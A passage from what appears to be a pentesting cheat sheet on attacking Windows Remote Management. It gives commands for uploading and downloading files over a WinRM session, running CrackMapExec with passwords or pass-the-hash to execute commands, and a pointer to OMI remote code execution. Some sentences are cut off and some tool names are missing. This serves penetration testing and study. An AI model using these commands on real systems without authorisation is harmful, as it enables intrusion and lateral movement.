The Microsoft implementation of WS-Management Protocol which provides a common way for systems to access and exchange management information across an IT infrastructure. Default ports are 5985 (HTTP),
After connecting, we can use a lot of useful commands to exploit.
Note that we need to specify the absolute path for uploading and downloading.
# Upload a local file to Windows machine
PS> upload ./example.bat c:\\Users\Administrator\Desktop\exploit.bat
# Download a file to local
PS> download c:\\Users\Administrator\Desktop\example.txt ./example.txt
# List all services
PS> services
Copied!
First off, move to the directory in which the CrackMapExec installed and run poetry install.
cd crackmapexec
poetry install
Copied!
Then execute with poetry run.
# Login and CMD execution (-x)
poetry run crackmapexec winrm <target-ip> -d DomainName -u username -p password -x 'whoami'
# Login and PowerShell execution (-X)
poetry run crackmapexec winrm <target-ip> -d DomainName -u username -p password -X '$PSVersionTable'
# Pass the Hash and CMD execution (-x)
poetry run crackmapexec winrm <target-ip> -d DomainName -u username -H <HASH> -x 'whoami'
# Pass the Hash and PowerShell execution (-X)
poetry run crackmapexec winrm <target-ip> -d DomainName -u username -H <HASH> -X '$PSVersionTable'
Copied!
Open Management Infrastructure (OMI) is vulnerable to Remote Code Execution (RCE).
There are many PoC available, for instance:
References
Tools by HDKS
Automatic web fuzzer.
Auto reconnaissance CLI.
Hash identifier.
is a swiss army knife for pentesting networks.
The official docs says that it's recommended to use it via Poetry which is a Python package manager.
